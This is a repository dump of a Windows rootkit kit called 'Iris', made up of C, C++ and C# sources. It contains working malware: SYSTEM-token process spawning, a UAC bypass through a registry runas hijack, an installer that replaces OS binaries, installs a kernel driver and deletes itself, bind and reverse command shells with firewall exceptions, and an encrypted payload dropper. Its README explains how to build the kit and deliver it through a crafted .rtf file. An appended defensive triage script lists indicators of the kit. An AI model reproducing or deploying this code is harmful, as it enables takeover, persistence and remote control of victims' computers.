        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;

    if (!::AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr)) {
        return FALSE;
    }

    if (::GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        return FALSE;

    return TRUE;
}

LPWSTR ConvertToLPWSTR(const std::string& s)
{
    LPWSTR ws = new wchar_t[s.size() + 1];
    copy(s.begin(), s.end(), ws);
    ws[s.size()] = 0;
    return ws;
}

BOOL EnableDebugPrivilege(void) {
    HANDLE hToken;
    BOOL result;
    if (!::OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }
    result = SetPrivilege(hToken, SE_DEBUG_NAME, TRUE);
    ::CloseHandle(hToken);
    return result;
}

// Duplicate the SYSTEM token into a primary token, move it into the caller's
// session so the new process shows up on the interactive desktop, and start Su.
int InQuota(LPWSTR Su, LPCTSTR P) {

    if (FALSE == EnableDebugPrivilege()) {
        return 1;
    }

    auto hToken = OpenSystemProcessToken();
    if (!hToken) {
        return 1;
    }

    HANDLE hDupToken, hPrimary;
    ::DuplicateTokenEx(hToken, TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_PRIVILEGES,
        nullptr, SecurityImpersonation, TokenImpersonation, &hDupToken);
    ::DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenPrimary, &hPrimary);
    ::CloseHandle(hToken);

    if (hDupToken == nullptr) {
        return 1;
    }

    STARTUPINFO si = { sizeof(si) };
    si.lpDesktop = L"Winsta0\\default";

    PROCESS_INFORMATION pi;

    BOOL impersonated = ::SetThreadToken(nullptr, hDupToken);
    assert(impersonated);
    if (!impersonated) {
        return 1;
    }

    HANDLE hCurrentToken;
    DWORD session = 0, len = sizeof(session);
    ::OpenProcessToken(::GetCurrentProcess(), TOKEN_ALL_ACCESS, &hCurrentToken);
    ::GetTokenInformation(hCurrentToken, TokenSessionId, &session, len, &len);
    ::CloseHandle(hCurrentToken);

    if (!SetPrivilege(hDupToken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE) ||
        !SetPrivilege(hDupToken, SE_INCREASE_QUOTA_NAME, TRUE)) {
        return 1;
    }

    BOOL ok = ::SetTokenInformation(hPrimary, TokenSessionId, &session, sizeof(session));

    ::CreateProcessAsUser(hPrimary, nullptr, Su, nullptr, nullptr, FALSE, 0, nullptr, P, &si, &pi);

    return 0;
}

// Derive the directory this binary runs from (argv[0] minus its last 12
// characters), then launch CMake.exe and installer.exe from there as SYSTEM.
VOID main(int argc, char* argv[]) {
    using namespace std;
    string MemExe = (string)argv[0];
    string Ptr = "";
    string pa = "";
    string Wp = "";
    auto Wpr = nullptr;
    for (int j = 0; j < MemExe.length() - 12; j++) {
        if (MemExe[j] == *"\\") {
            Ptr += "\\";
            pa += "\\";
            Wp += "\\";
        }
        Wp += MemExe[j];
        Ptr += MemExe[j];
        pa += MemExe[j];
    }
    Ptr += "\\"; pa += "\\";
    Ptr += "\\"; pa += "\\";
    Ptr += "CMake.exe"; pa += "installer.exe";
    LPWSTR Cl0 = ConvertToLPWSTR(Ptr);
    LPWSTR Cl1 = ConvertToLPWSTR(pa);
    auto h = InQuota(Cl0, nullptr);
    auto i = InQuota(Cl1, ConvertToLPWSTR(Wp));

}
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Chkntfs/stdafx.cpp:
--------------------------------------------------------------------------------
```cpp
#include "stdafx.h"
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Chkntfs/stdafx.h:
--------------------------------------------------------------------------------
```cpp
#pragma once

#include "targetver.h"

#include
#include

#include
#include
#include
#include

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifdef _DEBUG
#undef free
#define free(p) _free_dbg(p, _NORMAL_BLOCK); *(int*)&p = 0x666;
#endif

#ifndef _DEBUG_ONE
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "Kernel32.lib")
#pragma comment(lib, "opengl32.lib")
#pragma comment(lib, "comctl32.lib")
#pragma comment(lib,"Wtsapi32.lib")
#pragma comment(lib,"RpcRT4.lib")
#endif

#define IDR_RUNDLL32_DLL1 101

#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#include
#pragma comment(lib, "shlwapi.lib")
#endif
#endif

#include
#include

typedef int(*FUNKY_POINTER)(void);

#include

#define _WIN32_WINNT_WIN10_TH2 _WIN32_WINNT_WIN10
#define _WIN32_WINNT_WIN10_RS1 _WIN32_WINNT_WIN10

#ifdef _UNICODE
typedef wchar_t TCHAR;
#else
typedef char TCHAR;
#endif
typedef const TCHAR* LPCTSTR;

#ifndef _WIN32_WINNT
#define _WIN32_WINNT 0x0600
#endif

using std::string;
using namespace std;
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Chkntfs/targetver.h:
--------------------------------------------------------------------------------
```cpp
#pragma once
#include
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Config/Config.c:
--------------------------------------------------------------------------------
```c
#include
#include

// Trigger the auto-elevating backup tool; it resolves the exefile "runas" verb
// that RunOnce/Program.cs has just pointed at Chkntfs.exe in HKCU.
int main(void)
{
    system("c:\\Windows\\System32\\sdclt.exe /kickoffelev");
    return 0;
}
```

--------------------------------------------------------------------------------
/Iris/src/Installer/Config/installer.c:
--------------------------------------------------------------------------------
```c
#include
#include
#define _WIN32_WINNT 0x0500
#include
#include
#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "User32.lib")
// Self-delete: a detached cmd.exe uses ping as a delay, then deletes this binary.
#define SRS TEXT("cmd.exe /C ping 1.1.1.1 -n -w 3000 > nul & del \"%s\"")

void kamikaza(){
    TCHAR szModuleName[MAX_PATH];
    TCHAR szCmd[2 * MAX_PATH];
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};
    GetModuleFileName(NULL, szModuleName, MAX_PATH);
    StringCbPrintf(szCmd, 2 * MAX_PATH, SRS, szModuleName);
    CreateProcess(NULL, szCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

// Runs as SYSTEM (started by Chkntfs.exe). Takes ownership of the system
// directories, overwrites the OS binaries listed below with the kit's own,
// stages copies under servicing\Packages, registers the driver as an
// auto-start kernel service from a user-writable path, and removes itself.
void main(){
    HWND hWnd = GetConsoleWindow();
    ShowWindow( hWnd , SW_MINIMIZE );
    ShowWindow( hWnd, SW_HIDE );
    for(int q=0;q<1000000;q++){}
    system("takeown /F C:\\Windows\\System32\\Configuration");
    system("icacls C:\\Windows\\System32\\Configuration /grant administrators:F");
    system("takeown /F C:\\Windows\\SysWow64");
    system("icacls C:\\Windows\\SysWow64 /grant administrators:F");
    system("takeown /F C:\\Windows\\SysWow64\\Runonce.exe");
    system("icacls C:\\Windows\\SysWow64\\Runonce.exe /grant administrators:F");
    system("del C:\\Windows\\SysWow64\\Runonce.exe");
    system("takeown /F C:\\Windows\\SysWow64\\Chkntfs.exe");
    system("icacls C:\\Windows\\SysWow64\\Chkntfs.exe /grant administrators:F");
    system("del C:\\Windows\\SysWow64\\Chkntfs.exe");
    system("copy RunOnce.exe C:\\Windows\\SysWow64\\RunOnce.exe /Y");
    system("copy cleanup.exe C:\\Windows\\SysWow64\\cleanup.exe /Y");
    system("copy Config.exe C:\\Windows\\SysWow64\\Config.exe /Y");
    system("copy Chkntfs.exe C:\\Windows\\SysWow64\\Chkntfs.exe /Y");
    system("copy ns.exe C:\\Windows\\SysWow64\\installer.exe /Y");
    system("copy ds.exe C:\\Windows\\SysWow64\\Cmake.exe /Y");
    system("copy autochk.exe C:\\Windows\\SysWow64\\autochk.exe /Y");
    system("takeown /F C:\\Windows\\servicing\\Packages");
    system("icacls C:\\Windows\\servicing\\Packages /grant administrators:F");
    system("copy RunOnce.exe C:\\Windows\\servicing\\Packages\\RunOnce.exe /Y");
    system("copy cleanup.exe C:\\Windows\\servicing\\Packages\\cleanup.exe /Y");
    system("copy Config.exe C:\\Windows\\servicing\\Packages\\Config.exe /Y");
    system("copy Chkntfs.exe C:\\Windows\\servicing\\Packages\\Chkntfs.exe /Y");
    system("copy ns.exe C:\\Windows\\servicing\\Packages\\installer.exe /Y");
    system("copy ds.exe C:\\Windows\\servicing\\Packages\\CMake.exe /Y");
    system("copy autochk.exe C:\\Windows\\System32\\autochk.exe /Y");
    system("copy Zxc.sys C:\\Users\\Public\\Documents\\Zxc.sys");
    system("sc.exe create Zxc type=kernel binpath=\"C:\\Users\\Public\\Documents\\Zxc.sys\" start=auto");
    system("del RunOnce.exe");
    system("del autochk.exe");
    system("del ns.exe");
    system("del ds.exe");
    system("del Chkntfs.exe");
    system("del cleanup.exe");
    system("del Config.exe");
    system("del CMake.exe");
    system("del Zxc.sys");
    //_popen("C:\\Windows\\SysWow64\\installer.exe");
    kamikaza();
}
```

--------------------------------------------------------------------------------
/Iris/src/Installer/README.md:
--------------------------------------------------------------------------------
# All Visual C# projects use the same "designer.cs" template; just clone it into every .NET exe.

--------------------------------------------------------------------------------
/Iris/src/Installer/RunOnce/Program.cs:
--------------------------------------------------------------------------------
```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Text;
using System.Net.Sockets;
using Microsoft.Win32;
using System.Diagnostics;
using System.Net;
using System.IO;
using System.Runtime.InteropServices;

namespace RunOnce
{
    static class Program
    {
        // Point the per-user exefile "runas" verb at Chkntfs.exe in directory Q.
        // HKCU\Software\Classes takes precedence over HKLM when HKCR is resolved,
        // so this is what sdclt.exe /kickoffelev (started by Config.exe) will run.
        public static void rkStp(string Q)
        {
            Q += "\\Chkntfs.exe";
            try
            {
                Registry.SetValue(
                    "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command",
                    "",
                    Q,
                    RegistryValueKind.String
                );
            }
            catch { }
            try
            {
                Registry.SetValue(
                    "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command",
                    "isolatedCommand",
                    Q,
                    RegistryValueKind.String
                );
            }
            catch { }
            try
            {
                Registry.SetValue(
                    "HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command",
                    "(Default)",
                    Q,
                    RegistryValueKind.String
                );
            }
            catch { }

        }
        [STAThread]
        static void Main()
        {
            string d = Directory.GetCurrentDirectory();
            rkStp(d);
            string y = d + "\\Config.exe";
            Process process = new Process();
            process.StartInfo.FileName = y;
            process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            process.StartInfo.CreateNoWindow = true;
            process.EnableRaisingEvents = false;
            process.Start();
            Environment.Exit(0);
            // Everything below is the WinForms template remainder and is never reached.
            Application.Exit();
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new Form1());
            Environment.Exit(0);
        }
    }
}
```
-------------------------------------------------------------------------------- /Iris/src/Installer/ds/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | using System.Text; 7 | using System.Net.Sockets; 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | using System.Net; 11 | using System.IO; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace ds 15 | 16 | { 17 | static class Program 18 | { 19 | public static TcpListener getServer(System.Net.IPAddress IPAd) 20 | { 21 | int[] table = { 29034, 62001, 33333, 24097, 55555 }; 22 | for (int i = 0; i < table.Length; i++) 23 | { 24 | try 25 | { 26 | TcpListener serverSock_ = new TcpListener(IPAd, table[i]); 27 | return serverSock_; 28 | } 29 | catch 30 | { 31 | } 32 | } 33 | TcpListener serverSock = new TcpListener(IPAd, 66666); 34 | return serverSock; 35 | } 36 | public static string rc(string c) 37 | { 38 | int PROCESS_TIMEOUT = 100000; 39 | Process process = new Process(); 40 | StringBuilder outputStringBuilder = new StringBuilder(); 41 | try 42 | 43 | { 44 | process.StartInfo.FileName = "cmd.exe"; 45 | process.StartInfo.Arguments = "/c " + c; 46 | process.StartInfo.RedirectStandardError = true; 47 | process.StartInfo.RedirectStandardOutput = true; 48 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 49 | process.StartInfo.CreateNoWindow = true; 50 | process.StartInfo.UseShellExecute = false; 51 | process.EnableRaisingEvents = false; 52 | process.OutputDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 53 | process.ErrorDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 54 | process.Start(); 55 | process.BeginOutputReadLine(); 56 | process.BeginErrorReadLine(); 57 | var processExited = process.WaitForExit(PROCESS_TIMEOUT); 58 | 
try 59 | { 60 | string Ret = process.StandardOutput.ReadToEnd(); 61 | process.Kill(); 62 | return Ret; 63 | } 64 | catch 65 | { 66 | if (processExited == false) 67 | { 68 | string Ret = outputStringBuilder.ToString(); 69 | process.Kill(); 70 | return Ret; 71 | } 72 | else if (process.ExitCode != 0) 73 | { 74 | string output = outputStringBuilder.ToString(); 75 | return output; 76 | } 77 | else 78 | { 79 | process.Close(); 80 | string output = outputStringBuilder.ToString(); 81 | return output; 82 | } 83 | } 84 | } 85 | catch 86 | { 87 | process.Close(); 88 | return "..............................."; 89 | } 90 | } 91 | 92 | public static void SetStartup() 93 | { 94 | try 95 | 96 | { 97 | string Q = Directory.GetCurrentDirectory(); 98 | Q += "\\ds.exe"; 99 | string Re = rc("netsh advfirewall firewall add rule name=\"allowedprogram\" dir=in action=allow program=\"" + Q + "\" enable=yes"); 100 | } 101 | catch 102 | { 103 | } 104 | 105 | } 106 | public static System.Net.IPAddress GetLocalIPAddress() 107 | 108 | { 109 | var h = Dns.GetHostEntry(Dns.GetHostName()); 110 | foreach (var ip in h.AddressList) 111 | { 112 | if (ip.AddressFamily == AddressFamily.InterNetwork) 113 | { 114 | return ip; 115 | } 116 | } 117 | return IPAddress.Parse("127.0.0.1"); 118 | } 119 | public static void Runserver() 120 | { 121 | 122 | TcpClient tcpint = new TcpClient(); 123 | bool Auth = false; 124 | tcpint.Connect("your C&C Server", your port); // The Reverse Handler.... 
125 | Byte[] sBytes = Encoding.ASCII.GetBytes("Client Hello"); 126 | int requestCount = 0; 127 | requestCount = 0; 128 | requestCount = requestCount + 1; 129 | NetworkStream networkStream = tcpint.GetStream(); 130 | networkStream.Write(sBytes, 0, sBytes.Length); 131 | networkStream.Flush(); 132 | while ((true)) 133 | { 134 | try 135 | { 136 | byte[] bytesFrom = new byte[tcpint.ReceiveBufferSize]; 137 | networkStream.Read(bytesFrom, 0, bytesFrom.Length); 138 | string dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); 139 | string ret = rc(dataFromClient); 140 | string serverResponse = ret; 141 | Byte[] sendBytes = Encoding.ASCII.GetBytes(serverResponse); 142 | networkStream.Write(sendBytes, 0, sendBytes.Length); 143 | networkStream.Flush(); 144 | System.Threading.Thread.Sleep(5000); 145 | } 146 | catch 147 | { 148 | } 149 | } 150 | Application.EnableVisualStyles(); 151 | Application.SetCompatibleTextRenderingDefault(false); 152 | Application.Run(new Form1()); 153 | } 154 | [STAThread] 155 | static void Main(string[] args) 156 | { 157 | SetStartup(); 158 | Runserver(); 159 | Application.EnableVisualStyles(); 160 | Application.SetCompatibleTextRenderingDefault(false); 161 | Application.Run(new Form1()); 162 | } 163 | } 164 | } 165 | -------------------------------------------------------------------------------- /Iris/src/Installer/ns/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Threading.Tasks; 5 | using System.Windows.Forms; 6 | using System.Text; 7 | using System.Net.Sockets; 8 | using Microsoft.Win32; 9 | using System.Diagnostics; 10 | using System.Net; 11 | using System.IO; 12 | using System.Runtime.InteropServices; 13 | 14 | namespace ns 15 | 16 | { 17 | static class Program 18 | { 19 | public static TcpListener getServer(System.Net.IPAddress IPAd) 20 | { 21 | int[] table = { 29034, 62001 , 33333, 24097, 
55555}; 22 | for (int i = 0; i < table.Length; i++) 23 | { 24 | try 25 | { 26 | TcpListener serverSock_ = new TcpListener(IPAd, table[i]); 27 | return serverSock_; 28 | } 29 | catch 30 | { 31 | } 32 | } 33 | TcpListener serverSock = new TcpListener(IPAd, 66666); 34 | return serverSock; 35 | } 36 | public static string rc(string c) 37 | { 38 | int PROCESS_TIMEOUT = 40000; 39 | Process process = new Process(); 40 | StringBuilder outputStringBuilder = new StringBuilder(); 41 | try 42 | 43 | { 44 | process.StartInfo.FileName = "cmd.exe"; //cmd; 45 | process.StartInfo.Arguments = "/c " + c; 46 | process.StartInfo.RedirectStandardError = true; 47 | process.StartInfo.RedirectStandardOutput = true; 48 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; 49 | process.StartInfo.CreateNoWindow = true; 50 | process.StartInfo.UseShellExecute = false; 51 | process.EnableRaisingEvents = false; 52 | process.OutputDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 53 | process.ErrorDataReceived += (sender, eventArgs) => outputStringBuilder.AppendLine(eventArgs.Data); 54 | process.Start(); 55 | process.BeginOutputReadLine(); 56 | process.BeginErrorReadLine(); 57 | var processExited = process.WaitForExit(PROCESS_TIMEOUT); 58 | try 59 | { 60 | string Ret = process.StandardOutput.ReadToEnd(); 61 | process.Kill(); 62 | return Ret; 63 | } 64 | catch 65 | { 66 | if (processExited == false) 67 | { 68 | string Ret = outputStringBuilder.ToString(); 69 | process.Kill(); 70 | return Ret; 71 | } 72 | else if (process.ExitCode != 0) 73 | { 74 | string output = outputStringBuilder.ToString(); 75 | return output; 76 | } 77 | else 78 | { 79 | process.Close(); 80 | string output = outputStringBuilder.ToString(); 81 | return output; 82 | } 83 | } 84 | } 85 | catch 86 | { 87 | process.Close(); 88 | return "..............................."; 89 | } 90 | } 91 | 92 | public static void SetStartup() 93 | { 94 | try 95 | 96 | { 97 | string Q = 
Directory.GetCurrentDirectory(); 98 | Q += "\\ns.exe"; 99 | string Re = rc("netsh advfirewall firewall add rule name=\"allowedprogram\" dir=in action=allow program=\"" + Q + "\" enable=yes"); 100 | } 101 | catch 102 | { 103 | } 104 | 105 | } 106 | public static System.Net.IPAddress GetLocalIPAddress() 107 | 108 | { 109 | var h = Dns.GetHostEntry(Dns.GetHostName()); 110 | foreach (var ip in h.AddressList) 111 | { 112 | if (ip.AddressFamily == AddressFamily.InterNetwork) 113 | { 114 | return ip; 115 | } 116 | } 117 | return IPAddress.Parse("127.0.0.1"); 118 | } 119 | public static void Runserver() 120 | { 121 | 122 | System.Net.IPAddress IPAd = GetLocalIPAddress(); 123 | bool Auth = false; 124 | TcpListener serverSocket = getServer(IPAd); 125 | int requestCount = 0; 126 | TcpClient clientSocket = default(TcpClient); 127 | serverSocket.Start(); 128 | clientSocket = serverSocket.AcceptTcpClient(); 129 | requestCount = 0; 130 | while ((true)) 131 | { 132 | try 133 | { 134 | requestCount = requestCount + 1; 135 | NetworkStream networkStream = clientSocket.GetStream(); 136 | byte[] bytesFrom = new byte[clientSocket.ReceiveBufferSize]; 137 | networkStream.Read(bytesFrom, 0, bytesFrom.Length); 138 | string dataFromClient = System.Text.Encoding.ASCII.GetString(bytesFrom); 139 | string ret = rc(dataFromClient); 140 | string serverResponse = ret; 141 | Byte[] sendBytes = Encoding.ASCII.GetBytes(serverResponse); 142 | networkStream.Write(sendBytes, 0, sendBytes.Length); 143 | networkStream.Flush(); 144 | System.Threading.Thread.Sleep(5000); 145 | } 146 | catch 147 | { 148 | } 149 | } 150 | clientSocket.Close(); 151 | serverSocket.Stop(); 152 | Application.EnableVisualStyles(); 153 | Application.SetCompatibleTextRenderingDefault(false); 154 | Application.Run(new Form1()); 155 | } 156 | [STAThread] 157 | static void Main(string[] args) 158 | { 159 | SetStartup(); 160 | Runserver(); 161 | Application.EnableVisualStyles(); 162 | Application.SetCompatibleTextRenderingDefault(false); 
163 | Application.Run(new Form1()); 164 | } 165 | } 166 | } 167 | -------------------------------------------------------------------------------- /Iris/src/Installer/tc32k/Program.cs: -------------------------------------------------------------------------------- 1 |  2 | using System; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Threading.Tasks; 6 | using System.Windows.Forms; 7 | using System.Text; 8 | using System.Net.Sockets; 9 | using Microsoft.Win32; 10 | using System.Diagnostics; 11 | using System.Security.Cryptography; 12 | using System.Net; 13 | using System.IO; 14 | using System.IO.Compression; 15 | using System.Runtime.InteropServices; 16 | 17 | namespace tc32k 18 | 19 | { 20 | static class Program 21 | { 22 | private static void Ef(string iFs, string oFs, string pd) 23 | { 24 | 25 | try 26 | { 27 | UnicodeEncoding UE = new UnicodeEncoding(); 28 | byte[] key = UE.GetBytes(pd); 29 | 30 | string cryptFile = oFs; 31 | FileStream fsCrypt = new FileStream(cryptFile, FileMode.Create); 32 | 33 | RijndaelManaged RMCrypto = new RijndaelManaged(); 34 | 35 | CryptoStream cs = new CryptoStream(fsCrypt, 36 | RMCrypto.CreateEncryptor(key, key), 37 | CryptoStreamMode.Write); 38 | 39 | FileStream fsIn = new FileStream(iFs, FileMode.Open); 40 | 41 | int data; 42 | while ((data = fsIn.ReadByte()) != -1) 43 | cs.WriteByte((byte)data); 44 | 45 | 46 | fsIn.Close(); 47 | cs.Close(); 48 | fsCrypt.Close(); 49 | } 50 | catch (Exception er) 51 | { 52 | MessageBox.Show(er.ToString()); 53 | } 54 | } 55 | private static void Df(string iFs, string oFs, string pd) 56 | { 57 | 58 | { 59 | 60 | UnicodeEncoding UE = new UnicodeEncoding(); 61 | byte[] key = UE.GetBytes(pd); 62 | 63 | FileStream fsCrypt = new FileStream(iFs, FileMode.Open); 64 | 65 | RijndaelManaged RMCrypto = new RijndaelManaged(); 66 | 67 | CryptoStream cs = new CryptoStream(fsCrypt, 68 | RMCrypto.CreateDecryptor(key, key), 69 | CryptoStreamMode.Read); 70 | 71 | FileStream fsOut = new 
FileStream(oFs, FileMode.Create); 72 | 73 | int data; 74 | while ((data = cs.ReadByte()) != -1) 75 | fsOut.WriteByte((byte)data); 76 | 77 | fsOut.Close(); 78 | cs.Close(); 79 | fsCrypt.Close(); 80 | 81 | } 82 | } 83 | private static void Sed(string dr) { 84 | string foo = dr + "\\fs64.zip"; 85 | string To = dr; 86 | System.IO.Compression.ZipFile.ExtractToDirectory(foo,To); 87 | File.Delete(foo); 88 | } 89 | private static void Su( string y ) 90 | { 91 | try 92 | { 93 | string del = y + "\\tc32k.exe"; 94 | string KeyName = "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tc32k"; 95 | RegistryKey Hkey = Registry.CurrentUser; 96 | Hkey.DeleteValue(KeyName); 97 | } catch{ } 98 | } 99 | 100 | [STAThread] 101 | static void Main(string[] args) 102 | 103 | { 104 | string pa = Directory.GetCurrentDirectory(); 105 | int la = args.Length - 1; 106 | string pwd = args[la]; 107 | Df(pa + "\\fs64.enc", pa + "\\yourPayLoad.zip", pwd); 108 | try 109 | { 110 | Su(pa); 111 | Sed(pa); 112 | } 113 | catch (Exception t) { Console.Write(t); } 114 | string exv = pa + "\\yourPayLoad\\YourInstaller.exe"; 115 | ProcessStartInfo ps = new ProcessStartInfo(); 116 | ps.WorkingDirectory = pa + "\\yourPayLoad"; 117 | ps.FileName = exv; 118 | Process.Start(ps); 119 | Environment.Exit(0); 120 | Application.EnableVisualStyles(); 121 | Application.SetCompatibleTextRenderingDefault(false); 122 | Application.Run(new Form1()); 123 | Environment.Exit(0); 124 | } 125 | 126 | } 127 | 128 | } 129 | -------------------------------------------------------------------------------- /Iris/src/README.md: -------------------------------------------------------------------------------- 1 | # In Order To build the RootKit One needs to compile the driver (Drv) with wdk, compile all the installer files (after zipping them) and encrypt then using the tc32k source given save all by names and craft the .rtf with the payload given. 
2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Rats 2 | For more information at the moment, see Iris. 3 | --------------------------------------------------------------------------------
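For defenders, the sources above (installer.c, RunOnce/Program.cs and the ds/ns handlers) fix the host artifacts this kit leaves behind: an HKCU `exefile\shell\runas\command` handler (the auto-elevation path behind `sdclt.exe /kickoffelev`), a kernel service named `Zxc` whose image sits under `C:\Users\Public\Documents`, a firewall allow rule named `allowedprogram`, executables dropped into `SysWow64` and `servicing\Packages`, and a listener on one of the hard-coded ports. The triage script below is an added example, not part of the Iris repository; it runs those checks over a host snapshot dict whose layout (and the constructed sample, including the user name `alice`) is an assumption of this example, not something the page defines.

```python
# Added example (not Iris code): flag the host artifacts the Iris installer leaves.
# Indicators come from installer.c, RunOnce/Program.cs and ds/ns Program.cs above.

# File names the installer copies into SysWow64 / servicing\Packages. chkntfs.exe and
# runonce.exe exist legitimately in SysWow64, so a name match alone is not enough:
# the snapshot must also say whether the file carries a Microsoft signature.
DROPPED_NAMES = {"runonce.exe", "chkntfs.exe", "config.exe",
                 "installer.exe", "cmake.exe", "cleanup.exe"}
LISTEN_PORTS = {29034, 62001, 33333, 24097, 55555}   # getServer() port table
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\program files")


def is_system_path(path):
    """True when the path sits under a directory standard users cannot write to."""
    return path.lower().startswith(SYSTEM_DIRS)


def scan_snapshot(snap):
    """Return (indicator, detail) pairs found in a snapshot dict (format assumed here)."""
    findings = []
    # 1. HKCU exefile\shell\runas\command does not exist on a clean host at all;
    #    RunOnce.exe writes it so that the auto-elevated sdclt.exe launches Chkntfs.exe.
    for key, values in snap.get("registry", {}).items():
        if key.lower().endswith("software\\classes\\exefile\\shell\\runas\\command"):
            for name, data in values.items():
                findings.append(("uac_bypass_runas_hijack",
                                 f"{key}\\{name or '(Default)'} -> {data}"))
    # 2. A kernel driver service loading from a user-writable directory (sc create Zxc).
    for svc in snap.get("services", []):
        if svc["type"] == "kernel" and not is_system_path(svc["binpath"]):
            findings.append(("driver_outside_system_dirs", f"{svc['name']}: {svc['binpath']}"))
    # 3. Inbound allow rule for a program outside system dirs (netsh advfirewall ... add rule).
    for rule in snap.get("firewall_rules", []):
        if rule["action"] == "allow" and rule["dir"] == "in" and not is_system_path(rule["program"]):
            findings.append(("firewall_allow_nonsystem_program", f"{rule['name']}: {rule['program']}"))
    # 4. Dropped executables in system directories that are not Microsoft-signed.
    for f in snap.get("files", []):
        base = f["path"].rsplit("\\", 1)[-1].lower()
        if base in DROPPED_NAMES and is_system_path(f["path"]) and not f.get("signed_microsoft"):
            findings.append(("unsigned_dropper_in_system_dir", f["path"]))
    # 5. A process bound to one of the hard-coded listener ports.
    for lst in snap.get("listeners", []):
        if lst["port"] in LISTEN_PORTS:
            findings.append(("suspicious_listener_port", f"{lst['process']}:{lst['port']}"))
    return findings


# Constructed snapshot for the demo (not captured from a real host).
SAMPLE_SNAPSHOT = {
    "registry": {"HKEY_CURRENT_USER\\Software\\Classes\\exefile\\shell\\runas\\command": {
        "": "C:\\Users\\alice\\Downloads\\yourPayLoad\\Chkntfs.exe",
        "isolatedCommand": "C:\\Users\\alice\\Downloads\\yourPayLoad\\Chkntfs.exe"}},
    "services": [{"name": "Zxc", "type": "kernel", "binpath": "C:\\Users\\Public\\Documents\\Zxc.sys"},
                 {"name": "disk", "type": "kernel", "binpath": "C:\\Windows\\System32\\drivers\\disk.sys"}],
    "firewall_rules": [{"name": "allowedprogram", "dir": "in", "action": "allow",
                        "program": "C:\\Users\\alice\\Downloads\\yourPayLoad\\ds.exe"}],
    "files": [{"path": "C:\\Windows\\SysWow64\\chkntfs.exe", "signed_microsoft": False},
              {"path": "C:\\Windows\\SysWow64\\installer.exe", "signed_microsoft": False},
              {"path": "C:\\Windows\\SysWow64\\cmd.exe", "signed_microsoft": True}],
    "listeners": [{"process": "installer.exe", "port": 29034}, {"process": "svchost.exe", "port": 135}],
}

if __name__ == "__main__":
    for indicator, detail in scan_snapshot(SAMPLE_SNAPSHOT):
        print(f"[{indicator}] {detail}")
```

On a live host the same five fields would be filled from the registry, `sc query`, `netsh advfirewall firewall show rule`, file signature checks and `netstat -ano` before calling `scan_snapshot`.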